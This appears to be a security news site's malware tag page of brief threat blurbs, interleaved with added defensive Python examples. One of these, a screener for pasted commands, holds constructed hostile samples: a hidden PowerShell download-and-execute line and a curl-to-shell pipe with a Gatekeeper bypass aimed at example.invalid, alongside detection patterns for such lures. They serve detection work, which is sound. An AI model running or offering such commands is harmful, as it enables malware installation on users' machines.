Tag: malware
697 articles

script kiddie Risky Trend: Must-Have Parental Guide
Think a school outage means a shadowy hacker? More often it’s curious pupils: the UK ICO’s review of school breach reports found students behind over half of the insider-caused incidents, so parents can steer curiosity into clubs, supervised learning, and clear conversations about ethics before experimentation becomes real harm.

execute arbitrary code: Stunning Risky Cursor Flaw
Imagine opening a repo and it runs code without asking — Cursor, an AI-powered editor, can be tricked into silently executing arbitrary scripts from a crafted repository, putting your machine and credentials at risk. Until safer defaults arrive, treat untrusted repos like unknown executables: sandbox them, audit the project files before opening them, and turn on the editor’s workspace-trust prompt so project-defined tasks cannot run until you approve them.

bulletproof hosting Exposed: Risky Evasion Still Thrives
When the EU sanctioned Stark Industries, the bulletproof hosting firm just rebranded and moved assets to sister companies — a stark reminder that Kremlin-linked operators can easily dodge enforcement and keep malicious infrastructure online. To make sanctions stick, policymakers and tech firms must pair legal designations with faster takedowns, transparency rules, and tighter cooperation across registrars, payment processors and ISPs.

ConnectWise ScreenConnect Risky Exploit: Stunning AsyncRAT
Imagine your trusted remote-admin tool becoming the very doorway attackers use to steal credentials and siphon crypto—researchers found ConnectWise ScreenConnect sessions abused to run a fileless, in-memory VBScript loader that dropped AsyncRAT to harvest credentials, keystrokes and wallet data. Harden RMM access, monitor session scripts, and assume compromise—because when legitimate tooling is weaponized, detection needs to get smarter fast.

China Launched Egg Attacks: Alarming Risky Campaign
Researchers uncovered EggStreme, a stealthy in‑memory malware framework tied to intrusions against a Philippine military contractor that mirror Chinese APT tactics. Its fileless, modular design — ideal for long‑term spying or sabotage — is a wake‑up call to tighten contractor cyber hygiene, MFA, and public‑private defenses.

modular macOS backdoor: Stunning Dangerous Threat Revealed
What if your Mac had been quietly harboring a stealthy backdoor for years? Researchers say ChillyHell—a modular macOS implant—evaded Apple’s protections for up to four years, showing how dormancy and clever design let attackers hide in plain sight.

Salty2FA: Exclusive Dangerous Phishing Threat
A new phishing kit called Salty2FA is turning multi-factor authentication into an exploitable step, automating interception of codes, cookies, and push prompts to bypass SMS and app-based 2FA. Organizations should treat 2FA as an architecture—move to phishing-resistant methods like FIDO2, tighten session controls, and ramp up detection before attackers rent this tool and hit your users.
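Why FIDO2 survives a relay kit where SMS and app codes do not, as an added example that is not part of the page or of any vendor's code: the relying-party side of the WebAuthn assertion check, reduced to the parts that matter. The authenticator signs over authenticatorData plus SHA-256 of clientDataJSON, and the browser writes the origin it really loaded into clientDataJSON, so an assertion collected on a look-alike domain fails at the real site. The relying-party ID, origins and the HMAC stand-in for the credential's public-key signature are assumptions for the demo.

```python
"""Relying-party checks that make a relayed WebAuthn assertion useless.

Added example (not from the page or any library). Signature verification is a
callback; the demo uses an HMAC stand-in for the credential's public-key
signature, which real deployments verify with the stored ECDSA/RSA key.
"""
import base64
import hashlib
import hmac
import json
import secrets

RP_ID = "example.com"                            # assumed relying-party ID
ALLOWED_ORIGINS = {"https://login.example.com"}  # assumed: the only origin serving logins


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def build_auth_data(rp_id: str, user_present=True, user_verified=True, counter=7) -> bytes:
    """Minimal authenticatorData: rpIdHash (32) | flags (1) | signCount (4)."""
    flags = (0x01 if user_present else 0) | (0x04 if user_verified else 0)
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + counter.to_bytes(4, "big")


def verify_assertion(challenge: bytes, client_data_json: bytes, auth_data: bytes,
                     signature: bytes, verify_sig):
    """Return (ok, reason). verify_sig(signed_bytes, sig) is the public-key check for the credential."""
    try:
        cd = json.loads(client_data_json)
    except ValueError:
        return False, "clientDataJSON is not JSON"
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if cd.get("challenge") != b64url(challenge):
        return False, "challenge mismatch (replay or wrong session)"
    if cd.get("origin") not in ALLOWED_ORIGINS:   # the check a relay kit cannot satisfy
        return False, f"origin {cd.get('origin')!r} is not the relying party"
    if len(auth_data) < 37 or auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    if not auth_data[32] & 0x01:
        return False, "user presence flag not set"
    signed = auth_data + hashlib.sha256(client_data_json).digest()  # exactly what the authenticator signed
    if not verify_sig(signed, signature):
        return False, "bad signature"
    return True, "ok"


def demo() -> dict:
    """Same user, same authenticator, same valid signature: once on the real site, once via a relay."""
    key = secrets.token_bytes(32)                    # stand-in for the credential's private key
    sign = lambda data: hmac.new(key, data, "sha256").digest()
    verify = lambda data, sig: hmac.compare_digest(sign(data), sig)
    challenge = secrets.token_bytes(32)              # issued by the RP; the kit relays it unchanged
    auth_data = build_auth_data(RP_ID)
    results = {}
    for origin in ("https://login.example.com", "https://login-example.com.invalid"):
        # The browser fills in the origin it actually loaded. The kit cannot rewrite it
        # without breaking the hash the authenticator signed over.
        cd = json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                         "origin": origin}).encode()
        sig = sign(auth_data + hashlib.sha256(cd).digest())
        results[origin] = verify_assertion(challenge, cd, auth_data, sig, verify)
    return results


if __name__ == "__main__":
    for origin, (ok, why) in demo().items():
        print(f"{origin}: {'accepted' if ok else 'rejected'} ({why})")
```

In practice the browser would not even mint an assertion for rpId `example.com` from the look-alike origin; the demo keeps the rpIdHash valid on purpose so that the origin check alone is what rejects the relayed login. Session controls still matter after this point, because a kit that cannot relay the login can still steal an already-issued cookie.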

remote access trojan: Stunning Risky Threat Revealed
One click from a phishing email can now install MostereRAT — a stealthy, modular remote‑access trojan that evolved from banking malware into a plugin‑driven tool for data theft, persistence and lateral movement — proving attackers are turning familiar scams into long‑term, hard‑to‑detect footholds. Protect yourself with multifactor authentication, least‑privilege access, up‑to‑date patching and behavioral detection, because signature‑based defenses alone won’t cut it.

crypto phishing Shocking Supply-Chain Nightmare
One phishing click that reset a maintainer’s 2FA let attackers slip backdoors into at least 18 popular npm packages — including debug and chalk — turning trusted libraries into supply-chain landmines. It’s a wake-up call: human error can ripple through the entire ecosystem, so stronger authentication, multi-person publishing, and tighter dependency hygiene can’t wait.

Salt Typhoon: Exclusive, Dangerous Domain Network
Imagine attackers quietly living in your network for years — Salt Typhoon used dozens of rotating, innocent-looking domains since 2020 to stay hidden, steal intelligence, and frustrate takedowns. Defenders now need continuous monitoring, smarter DNS controls, and cross-sector cooperation to spot and evict these patient spies.

GPUGate malware: Exclusive Risky Search-Ad Campaign
Think twice before clicking that top search result—new GPUGate malvertising buys Google Ads and even fakes GitHub commit hashes to push trojanized installers that look legit. Protect yourself by sticking to official project pages, verifying signatures, and avoiding downloads from ad links.

remote-access trojan Stealthy Risk: Exclusive Alert
Meet MostereRAT: a stealthy remote-access trojan that slips into Windows systems via convincing phishing and then hides using living‑off‑the‑land tactics, process injection and obfuscated code to evade detection. The takeaway: basic hygiene—skepticism about attachments, disabled macros, timely patches and layered visibility—now matters more than ever.

TP-Link routers: Must-Fix Risky Vulnerabilities
CISA warns that attackers are actively exploiting multiple vulnerabilities in widely used TP‑Link routers, putting homes and small businesses at risk of persistent compromise. Check for firmware updates, disable remote management, change default passwords, and replace aging devices if you can to close the door on intruders.

CastleRAT malware: Exclusive Dangerous C/Python Threat
A new strain of CastleRAT, now rewritten in both C and Python, is being spread via a nasty ClickFix trick that convinces users to paste malicious commands into their terminals—don’t paste commands you don’t trust. Stay skeptical of unsolicited “fixes,” verify sources, and treat pasteable commands like executable attachments.

macOS stealer Exclusive: Dangerous, Must-Stop Threat
Think a cracked app is a harmless shortcut? Trend Micro warns that a macOS stealer called AMOS is being bundled with pirated apps and delivered via terminal commands that grant attackers sweeping access—don’t run unverified installers or command-line scripts, and stick to legitimate software to protect your accounts and networks.
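The ClickFix item above and this AMOS item both end with the same advice: treat a pasteable command like an executable attachment. The screener below is an added example written for this page (not from Trend Micro, the CastleRAT write-up, or any product) that applies that advice mechanically: it unwraps base64 layers, including the UTF-16LE form that `powershell -enc` takes, and flags the behaviours these lures rely on. The sample commands are constructed for the demo and point at `example.invalid`.

```python
"""Screen a command a web page asked you to paste into a terminal.

Added example, not from the page or any vendor. The indicator list is a
starting point, not a complete signature set; tune it to your environment.
"""
import base64
import binascii
import re

INDICATORS = [
    (r"\|\s*(sh|bash|zsh|osascript)\b", "pipes fetched/decoded content into a shell"),
    (r"\b(curl|wget)\b.*\b(sh|bash|python)\b", "downloads and executes remote content"),
    (r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|start-bitstransfer)\b",
     "PowerShell download/execute"),
    (r"\bmshta\b", "mshta launches an HTA (a common ClickFix stage)"),
    (r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|executionpolicy\s+bypass",
     "hides the window or bypasses execution policy"),
    (r"xattr\s+(-c|-d\s+com\.apple\.quarantine)", "strips the macOS quarantine flag (Gatekeeper bypass)"),
    (r"\bnohup\b|\bdisown\b|&\s*$", "detaches the process so it outlives the terminal"),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/=_-]{24,}")


def _decode_candidates(text: str) -> list:
    """Plausible base64 decodings of long tokens, as UTF-16LE (powershell -enc) or UTF-8."""
    out = []
    for tok in B64_TOKEN.findall(text):
        std = tok.replace("-", "+").replace("_", "/")
        try:
            raw = base64.b64decode(std + "=" * (-len(std) % 4), validate=True)
        except (ValueError, binascii.Error):
            continue
        for enc in ("utf-16le", "utf-8"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if s.isascii() and len(s) >= 8 and all(ch.isprintable() or ch in "\r\n\t" for ch in s):
                out.append(s)
                break
    return out


def screen_command(cmd: str, depth: int = 0, max_depth: int = 3) -> list:
    """Return the reasons a pasted command looks hostile, following base64 layers."""
    low = cmd.lower()
    reasons = [why if depth == 0 else f"[decoded layer {depth}] {why}"
               for pat, why in INDICATORS if re.search(pat, low, re.MULTILINE)]
    if depth < max_depth:
        for inner in _decode_candidates(cmd):
            reasons.extend(screen_command(inner, depth + 1, max_depth))
    return reasons


def _b64(s: str, encoding: str = "utf-8") -> str:
    return base64.b64encode(s.encode(encoding)).decode()


# Constructed samples in the shape of the lures described above; hosts are .invalid on purpose.
SAMPLES = {
    "clickfix": "powershell -w hidden -nop -ep bypass -enc "
                + _b64("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')", "utf-16le"),
    "amos": "echo " + _b64("curl -fsSL http://example.invalid/update | sh; xattr -c /Applications/Example.app")
            + " | base64 -d | sh",
    "benign": "git clone https://github.com/example/repo.git && cd repo && make",
}


def demo() -> dict:
    return {name: screen_command(cmd) for name, cmd in SAMPLES.items()}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name}: {'OK' if not reasons else ''}")
        for r in reasons:
            print("   -", r)
```

Anything that returns a non-empty list deserves the same treatment as an unexpected .exe in your inbox: do not run it, and keep the decoded layers for the ticket.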

Sitecore sample keys: Risky, Must-Have Fixes
A copy‑paste of Sitecore’s documented sample machineKey values has been weaponized to gain remote code execution and install snooping malware, proving that example keys in production are dangerous secrets. Check your Sitecore instances now, rotate any sample keys, and lock down exposed endpoints before scanners turn convenience into a full breach.
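An added check for the advice above, written for this page rather than taken from Sitecore or the researchers who reported the abuse: it parses a `web.config`, flags a `machineKey` whose values match a list of known sample keys, reports a short fingerprint of each key so you can spot the same key reused across instances without printing the secret, and flags `enableViewStateMac="false"` while it is there. The sample-key list is a constructed placeholder to be replaced with the published values from Sitecore's own guidance; the config it scans is constructed too.

```python
"""Flag documentation sample keys (and worse) in an ASP.NET/Sitecore web.config.

Added example, not from Sitecore or the page. KNOWN_SAMPLE_KEYS holds constructed
stand-ins; fill it from Sitecore's published guidance and your own key inventory.
"""
import hashlib
import xml.etree.ElementTree as ET

SAMPLE_VKEY = "0123456789ABCDEF" * 8   # constructed stand-in for a documented sample validationKey
SAMPLE_DKEY = "FEDCBA9876543210" * 3   # constructed stand-in for a documented sample decryptionKey
KNOWN_SAMPLE_KEYS = {"validationKey": {SAMPLE_VKEY}, "decryptionKey": {SAMPLE_DKEY}}


def check_web_config(xml_text: str) -> list:
    """Return (severity, message) findings for the machineKey and ViewState MAC settings."""
    root = ET.fromstring(xml_text)
    mk = next(root.iter("machineKey"), None)
    if mk is None:
        return [("info", "no explicit <machineKey>: ASP.NET auto-generates keys per server")]
    if mk.get("configSource"):
        return [("info", f"machineKey lives in {mk.get('configSource')}; run this check on that file")]
    findings = []
    for attr in ("validationKey", "decryptionKey"):
        val = (mk.get(attr) or "").strip().upper()
        if not val or val.startswith("AUTOGENERATE"):
            continue
        fp = hashlib.sha256(val.encode()).hexdigest()[:12]   # compare fingerprints, never the key itself
        if val in KNOWN_SAMPLE_KEYS[attr]:
            findings.append(("critical", f"{attr} matches a published sample key (fingerprint {fp}); "
                                         "anyone with the docs can forge ViewState, rotate it now"))
        else:
            findings.append(("info", f"{attr} fingerprint {fp}; a fingerprint shared by unrelated "
                                     "instances means a shared key"))
    pages = next(root.iter("pages"), None)
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append(("critical", "enableViewStateMac=false: ViewState is not authenticated at all"))
    return findings


# Constructed web.config with both sample keys pasted in, as the blurb describes.
DEMO_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="{v}" decryptionKey="{d}" validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>""".format(v=SAMPLE_VKEY, d=SAMPLE_DKEY)


def demo() -> list:
    return check_web_config(DEMO_WEB_CONFIG)


if __name__ == "__main__":
    for severity, msg in demo():
        print(f"[{severity.upper()}] {msg}")
```

Run it over every `web.config` (and any file a `configSource` attribute points at) on each Sitecore instance; rotate on a critical finding, then hunt for the post-exploitation activity the report describes, since a rotated key does not evict an attacker who already used the old one.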

search engine poisoning: Stunning Dangerous Threat
Imagine trusted search results quietly steering you to shady gambling sites — ESET’s researchers uncovered GhostRedirector, a China-aligned crew that hijacks internet-facing Windows servers with Potato-family exploits and stealth malware to poison search rankings for profit. This subtle, long-running tactic shows why monitoring server integrity, patching privilege-escalation flaws, and watching for sudden ranking anomalies are now essential defenses against invisible manipulation.

Microsoft Outlook backdoor: Exclusive Dangerous Threat
A new Outlook backdoor called NotDoor quietly watches for trigger words inside incoming mail, letting APT28 gain stealthy, long-term access to companies across NATO countries. Defenders should harden endpoints, disable unnecessary VBA, and share threat intelligence to detect and disrupt these low-noise, high-impact intrusions.

GhostRedirector: Exclusive Dangerous China-Aligned Threat
A newly discovered group called GhostRedirector quietly breached 65 Windows servers using custom tools and stealthy redirection techniques, and its infrastructure and tradecraft point to China-aligned objectives. Treat this as a wake-up call to move beyond signature-based detection, hunt for anomalous behavior, and harden your systems now.

threat-intel sharing: Must-Have Critical Lifeline
As the reauthorization deadline nears, Congress must decide whether to renew cyber‑intel sharing authorities and funding that let companies and federal defenders act fast — a lapse could hamstring responses, while sensible reforms could bolster privacy at the cost of speed.

VBA-based backdoor: Stunning Risky Outlook Threat
Think your inbox is safe? Researchers warn APT28 has deployed a VBA-based Outlook backdoor called NotDoor that hides in macros to harvest emails and stay persistent, so it’s time to tighten macro policies, add telemetry, and treat your mail client as part of the attack surface.
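Both NotDoor items above come down to macro policy and persistence in Outlook. The triage below is an added example written for this page, not code from the researchers who reported NotDoor: it parses a collected `reg export` of the user's Office keys (decode the file as UTF-16 first) and reports a macro security `Level` that allows unsigned VBA and a `LoadMacroProviderOnBoot` flag, which forces Outlook to load the user's `VbaProject.OTM` at start-up. The value names and the meaning of each `Level` reflect my understanding of Outlook's settings, not anything stated on the page, and the export it reads is constructed.

```python
"""Triage an exported Outlook registry hive for permissive macro policy and VBA auto-load.

Added example, not from the page or the NotDoor research. Assumed value names:
HKCU\\Software\\(Policies\\)Microsoft\\Office\\<ver>\\Outlook\\Security\\Level and
HKCU\\Software\\Microsoft\\Office\\<ver>\\Outlook\\LoadMacroProviderOnBoot.
"""
import re

REG_SECTION = re.compile(r"^\[(HKEY_[^\]]+)\]\s*$")
REG_VALUE = re.compile(r'^"([^"]+)"=(dword:([0-9a-fA-F]{8})|"(.*)")\s*$')

# Assumed mapping of Outlook's Trust Center choices to the Level DWORD.
LEVEL_MEANING = {1: "enable all macros", 2: "notify for all macros",
                 3: "notify for signed macros only (default)", 4: "disable all macros"}


def parse_reg_export(text: str) -> dict:
    """Parse the .reg subset this triage needs: key headers, dword values, string values."""
    hives, current = {}, None
    for line in text.splitlines():
        m = REG_SECTION.match(line)
        if m:
            current = hives.setdefault(m.group(1).lower(), {})
            continue
        m = REG_VALUE.match(line)
        if m and current is not None:
            name, dword, string = m.group(1).lower(), m.group(3), m.group(4)
            current[name] = int(dword, 16) if dword is not None else string
    return hives


def assess_outlook_macros(hives: dict) -> list:
    """Return (severity, message) findings for each Office version present in the export."""
    findings = []
    for ver in ("16.0", "15.0"):
        base = f"hkey_current_user\\software\\microsoft\\office\\{ver}\\outlook"
        user_sec = base + "\\security"
        policy = f"hkey_current_user\\software\\policies\\microsoft\\office\\{ver}\\outlook\\security"
        if not any(k in hives for k in (base, user_sec, policy)):
            continue
        # A policy-set Level overrides whatever the user (or malware) wrote under the user key.
        if "level" in hives.get(policy, {}):
            level, source = hives[policy]["level"], "policy"
        else:
            level, source = hives.get(user_sec, {}).get("level"), "user"
        if level is None:
            findings.append(("info", f"Office {ver}: Level not set; Outlook uses its default "
                                     f"({LEVEL_MEANING[3]})"))
        elif level == 1:
            findings.append(("critical", f"Office {ver}: Level=1 ({LEVEL_MEANING[1]}) via {source} setting"))
        elif level != 4:
            findings.append(("warn", f"Office {ver}: Level={level} ({LEVEL_MEANING.get(level, '?')}) via "
                                     f"{source} setting; set 4 by policy unless VBA is needed"))
        if hives.get(base, {}).get("loadmacroprovideronboot") == 1:
            findings.append(("suspicious", f"Office {ver}: LoadMacroProviderOnBoot=1 loads VbaProject.OTM "
                                           "at start-up; inspect %APPDATA%\\Microsoft\\Outlook\\VbaProject.OTM"))
    return findings


# Constructed export of a host where a macro implant has relaxed the policy and enabled auto-load.
DEMO_REG = """Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook]
"LoadMacroProviderOnBoot"=dword:00000001

[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Security]
"Level"=dword:00000001
"""


def demo() -> list:
    return assess_outlook_macros(parse_reg_export(DEMO_REG))


if __name__ == "__main__":
    for severity, msg in demo():
        print(f"[{severity.upper()}] {msg}")
```

Collect the input with `reg export "HKCU\Software\Microsoft\Office" office.reg` (and the Policies path) on the host, or from a mounted NTUSER.DAT via your forensic tooling; a hardened host returns nothing because the policy key pins `Level` to 4 and the auto-load value is absent.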

IPTV piracy: Stunning 1,100-Domain Risk Exposed
A massive IPTV piracy ring spanning about 1,100 domains was exposed, offering dirt‑cheap access to Apple TV, Disney+, HBO and Netflix while often exposing viewers to malware and fraud and costing rights holders billions in lost revenue. The takedown shows how convenience and low cost fuel organized piracy that threatens creators, consumers and the whole streaming ecosystem.

Lazarus Group Exclusive: Dangerous DeFi RATs Revealed
A North Korea-linked Lazarus campaign used a crafty phishing lure to deploy three cross-platform RATs—PondRAT, ThemeForestRAT and RemotePE—breaching a DeFi organization and highlighting how attackers now tailor stealthy, multi‑OS toolsets to target decentralized finance. It’s a wake-up call: assume breach, tighten access and key protections, and shift to behavior-based detection across heterogeneous environments.

signed Windows kernel driver: Stunning Risky Backdoor
When a Microsoft‑signed WatchDog driver (amsdk.sys) was abused to neuter endpoint defenses and plant ValleyRAT, it proved that a valid signature isn’t a guarantee of safety. This Silver Fox campaign underscores why organizations must stop trusting signatures alone and add behavior‑based controls and tighter vetting for privileged drivers.